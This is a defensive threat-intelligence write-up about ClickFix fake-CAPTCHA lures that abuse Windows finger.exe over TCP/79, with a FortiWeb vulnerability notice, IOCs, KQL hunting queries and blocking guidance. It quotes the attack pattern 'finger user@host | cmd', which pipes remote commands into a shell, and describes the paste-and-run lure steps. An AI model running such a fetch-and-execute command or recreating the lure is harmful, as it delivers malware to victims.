Clickfix

SANS ISC documented a fresh KongTuke lure on November 18, 2025 that uses a fake CAPTCHA page and a ClickFix-style clipboard injection to run a PowerShell one-liner, which pulls a ZIP containing a malicious Python script and a bundled Windows Python runtime. Post-infection artifacts land under AppData\Roaming\DATA with persistence via a Scheduled Task; IOCs include multiple paths on 64.111.92[.]212:6655 and later HTTPS to telegra.ph, which itself is legitimate infrastructure often abused as an intermediary. See the primary diary for details and hashes (SANS ISC).

Fortinet has acknowledged active exploitation of a FortiWeb GUI path traversal that lets an unauthenticated attacker reach a CGI endpoint and impersonate users, including admins, to run privileged actions such as creating new administrator accounts (CVE-2025-64446) (Fortinet PSIRT FG-IR-25-910; NVD entry). SANS ISC’s Stormcast on November 17, 2025 highlighted widespread scanning and recommended treating exposed, unpatched appliances as compromised until proven otherwise (SANS Stormcast 2025-11-17). In parallel, ClickFix lures are leveraging Windows finger.exe to fetch follow-on commands over the legacy Finger protocol, making egress on TCP/79 a simple detection point (SANS ISC diary; BleepingComputer).

SANS Internet Storm Center reports that current ClickFix campaigns are abusing the built-in Windows finger.exe client to retrieve attacker-hosted scripts over the legacy Finger protocol. The tool isn’t proxy-aware and the destination port is fixed to 79/TCP, which means well-configured explicit egress proxies that block TCP/79 will break this stage. (isc.sans.edu)

Intrusion Flow

• Initial social engineering. ClickFix pages masquerade as “human verification” or problem/solution flows that preload a command into the clipboard and instruct the user to paste and run it. Recent variants add OS detection, countdown timers, and even video instructions to increase compliance. (bleepingcomputer.com)
• Fetch via Finger. In the finger.exe-enabled branch, the lure runs a command that uses Finger to pull a remote command stream and then pipes it into a shell for execution (for example, finger user@host | cmd). BleepingComputer documented live samples where the finger output is piped to cmd.exe to stage additional tooling. (bleepingcomputer.com)
• Payload staging. Observed scripts create working directories, rename built-in utilities (for example, curl.exe) and fetch archives masquerading as benign files, expanding to stealer or RAT payloads. (bleepingcomputer.com)
• Evolution to FileFix. Some crews now avoid terminals entirely, abusing the File Explorer address bar to execute hidden PowerShell (FileFix) as an evolution of the same idea. Expect the Finger fetch step to be swapped for other low-visibility transports over time. (bleepingcomputer.com)

Key Artifacts to Pull

• Process execution
  • Windows Security Event ID 4688 with command line (enable “Include command line in process creation events”). Hunt for finger.exe and any pipeline to cmd.exe/PowerShell. (learn.microsoft.com)
  • Sysmon Event ID 1 (ProcessCreate) for C:\Windows\System32\finger.exe and parent lineage (browser → cmd.exe → finger.exe, etc.). (learn.microsoft.com)
• Network evidence
  • Sysmon Event ID 3 (NetworkConnect) showing outbound TCP connections to remote port 79 with Image ...\finger.exe. (system32.eventsentry.com)
  • Windows Filtering Platform (WFP) events if “Audit Filtering Platform Connection” is enabled: 5156 (allowed) and 5157 (blocked), which include app path, IPs, and ports. (windows-security.org)
  • Host firewall logs (pfirewall*.log) if “log successful connections” and/or “log dropped packets” is enabled. (learn.microsoft.com)
• Disk artifacts (execution evidence)
  • Prefetch: FINGER.EXE-*.pf under C:\Windows\Prefetch (run count and up to eight last-run timestamps on Win 8+). (magnetforensics.com)
  • Amcache: C:\Windows\AppCompat\Programs\Amcache.hve can record program presence (and sometimes execution metadata); treat it as corroboration, not sole proof of execution. (securelist.com)

Detection Notes

• Microsoft Defender XDR (Advanced Hunting)
  • Process creation and network join:

    let lookback = 14d;
    let finger_execs = DeviceProcessEvents
      | where Timestamp > ago(lookback)
      | where FileName =~ "finger.exe";
    let finger_net = DeviceNetworkEvents
      | where Timestamp > ago(lookback)
      | where RemotePort == 79 and Protocol =~ "Tcp";
    finger_execs
      | project Timestamp, DeviceName, InitiatingProcessAccountName, ProcessCommandLine, FolderPath, ProcessId
      | join kind=leftouter (
          finger_net | project Timestamp, DeviceName, RemoteIP, RemotePort, InitiatingProcessId, InitiatingProcessCommandLine
        ) on $left.DeviceName == $right.DeviceName and $left.ProcessId == $right.InitiatingProcessId
      | order by Timestamp desc
    

    Uses DeviceProcessEvents and DeviceNetworkEvents schemas. (learn.microsoft.com)
  • Suspicious pipeline usage:

    DeviceProcessEvents
    | where Timestamp > ago(14d)
    | where FileName =~ "cmd.exe" or FileName =~ "powershell.exe"
    | where ProcessCommandLine has "finger " and ProcessCommandLine contains "|"
    

    Back this with network to TCP/79 where available. (learn.microsoft.com)
• Windows Eventing/Sysmon
  • Enable Security 4688 with command line and Sysmon IDs 1 and 3; filter on Image endswith \\finger.exe and DestinationPort = 79. (learn.microsoft.com)
• Packet capture/NIDS
  • Finger is TCP/79; on packet tools, filter tcp.port == 79. Zeek has historically provided a Finger analyzer, but check your version and plugin set-many deployments will simply rely on conn.log for port 79 traffic. (iana.org)

Response Guidance

• Contain egress on TCP/79
  • The attacking step depends on direct TCP/79 to the Internet. Block 79/TCP egress from user segments at your perimeter and host firewalls. This aligns with baseline control guidance to default-deny outbound on endpoints and only allow required services. (isc.sans.edu)
  • Example (local host firewall, admin CMD):

    netsh advfirewall firewall add rule name="Block TCP79 Outbound" dir=out action=block protocol=TCP remoteport=79
    

    Or deploy an outbound port rule via GPO/MDM at scale. (learn.microsoft.com)
• Proxy design
  • finger.exe is not proxy-aware; in environments with explicit proxies and default-deny egress, the fetch will fail. In transparent proxy setups, ensure port 79 is denied outbound. (isc.sans.edu)
• Endpoint hardening
  • Where feasible, block or tightly scope finger.exe via AppLocker/WDAC policy (publisher/path/hash rule), while monitoring for operational impact. (learn.microsoft.com)
• Host triage
  • Isolate the system; collect Security 4688, WFP 5156/5157, Sysmon 1/3, Prefetch, Amcache, and firewall logs. Review the parent chain that launched finger.exe and any subsequent curl/PowerShell activity to determine secondary payloads. (learn.microsoft.com)
• User comms
  • Re-educate on ClickFix patterns: fake Cloudflare checks, clipboard-injected commands, “Win+R → Ctrl+V → Enter,” and the Explorer address-bar variant (FileFix). (securityweek.com)

Takeaways

• Add hunts and detections for finger.exe execution and outbound TCP/79 connections; block TCP/79 egress broadly. (isc.sans.edu)
• Treat any finger ... | cmd/PowerShell pipeline as high-signal and pivot to payload retrieval and persistence checks. (bleepingcomputer.com)
• Reinforce application control and user training to blunt evolving ClickFix/FileFix social-engineering chains. (bleepingcomputer.com)